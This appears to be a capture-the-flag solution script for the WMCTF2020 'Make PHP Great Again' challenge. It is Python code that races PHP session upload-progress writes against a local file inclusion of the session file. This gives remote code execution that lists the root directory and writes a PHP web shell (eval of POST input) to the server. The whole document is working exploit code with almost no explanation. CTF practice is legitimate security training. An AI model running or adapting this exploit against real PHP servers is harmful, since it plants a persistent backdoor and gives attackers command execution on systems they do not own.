[WMCTF2020]Make PHP Great Again

import io

import sys

import requests

import threading

host = 'http://f1f8290e-450c-47c9-8dfd-b1bb5f4a2807.node4.buuoj.cn:81/'

sessid = 'flag'

def write(session):

    while True:

        f = io.BytesIO(b'a' * 1024 * 50)

        session.post(

            host,

            data={

                "PHP_SESSION_UPLOAD_PROGRESS": "<?php $shell='<?php @eval($_POST[cmd])?>';system('ls /');fputs(fopen('shell.php','w'),$shell);file_put_contents('shell.php',$shell);echo md5('1');?>"},

            files={"file": ('a.txt', f)},

            cookies={'PHPSESSID': sessid}

        )

def read(session):

    while True:

        response = session.get(f'{host}?file=/tmp/sess_{sessid}')

        # 1 的 MD5 值

        if 'c4ca4238a0b923820dcc509a6f75849b' not in response.text:

            print('[+++]retry')

        else:

            print(response.text)

            sys.exit()

with requests.session() as session:

    t1 = threading.Thread(target=write, args=(session,))

    t1.daemon = True  # 主线程退出时，不管子线程是否完成都随主线程退出

    t1.start()

    read(session)